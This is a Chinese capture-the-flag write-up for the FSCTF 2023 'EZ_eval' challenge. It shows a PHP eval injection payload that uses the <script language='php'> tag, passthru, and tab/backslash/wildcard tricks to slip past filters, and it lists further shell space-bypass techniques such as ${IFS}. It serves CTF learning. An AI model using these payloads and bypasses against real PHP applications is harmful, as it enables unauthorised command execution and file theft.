[FSCTF 2023]EZ_eval
![[FSCTF 2023]EZ_eval](https://imgs.yssmx.com/Uploads/2023/10/711356-1.png)
这道题关键就是过滤了?号和空格还有eval执行时用了php的结束标志表示php代码到此为止了,那不行啊我后面的参数还等着被执行呢……
可以用php短标签,有三种方式:
-
<? echo '123';?> #前提是开启配置参数short_open_tags=on -
<script language="php">echo 'hello'; #不需要修改参数开关,但是只能在7.0以下可用。 -
<% echo '123';%> #开启配置参数asp_tags=on,并且只能在7.0以下版本使用
![[FSCTF 2023]EZ_eval](https://imgs.yssmx.com/Uploads/2023/10/711356-2.png)
所以用第二种嘛构造payload:word=<script%09language="php">passthru("ta\c%09/f*");
用%09绕过空格,其它的我都试了一遍,没绕过
用\绕过tac的限制
*通配符绕过flag的关键字
最后:
![[FSCTF 2023]EZ_eval](https://imgs.yssmx.com/Uploads/2023/10/711356-3.png)
其它绕过空格的方式:%20: 在URL编码中,空格通常被表示为
%20。%09: 水平制表符(Horizontal Tab)的URL编码是
%09。使用其他字符: 有时你可以使用其他字符来代替空格,例如使用下划线
_ 或连字符- 来表示空格。\t
${IFS}
$IFS$1//1这个数字写什么都行好像
<
<>,
文章来源地址https://www.toymoban.com/news/detail-711356.html文章来源:https://www.toymoban.com/news/detail-711356.html
到了这里,关于[FSCTF 2023]EZ_eval的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
![[SWPUCTF 2022 新生赛]ez_ez_php](https://imgs.yssmx.com/Uploads/2024/02/658447-1.png)
